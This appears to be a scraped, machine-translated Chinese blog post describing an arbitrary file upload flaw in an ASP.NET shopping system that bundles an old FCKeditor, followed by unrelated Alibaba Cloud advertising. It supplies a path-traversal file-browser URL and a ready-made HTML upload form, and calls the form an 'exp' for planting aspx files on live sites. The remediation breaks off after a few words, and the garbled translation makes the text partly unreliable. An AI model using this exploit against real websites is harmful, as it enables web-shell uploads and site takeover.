Author: constanding
I happened to run into this program tonight and searched for it. I found that there are still many users. The hacker has not found the vulnerability of the program, so he found the source code, the fckeditor folder, and the directory structure. Upload the files to the aspx file and take them ..
This is China's first free open-source Shopping System for ASP. NET. The latest version is 4.7, And the fckeditor Editor Version earlier than 2.4 is used. Therefore, you can directly upload any file.
I did not test other versions. The problem is probably the same.
Http://www.bkjia.com/controls/fckeditor/editor/filemanager/browser/default/browser.html? Type = ../& Connector = connectors/aspx/connector. aspx
Go to the root directory of the website to upload arbitrary files.
If the connector. aspx file is deleted, run the following exp command to save the following code as html and upload any file:
<Form id = "frmUpload" enctype = "multipart/form-data" action = "http://www.bkjia.com/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx? Type = Media "method =" post ">
Upload a new file: <br>
<Input type = "file" name = "NewFile" size = "50"> <br>
<Input id = "btnUpload" type = "submit" value = "Upload">
</Form>
Fix: You can change the editor...
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
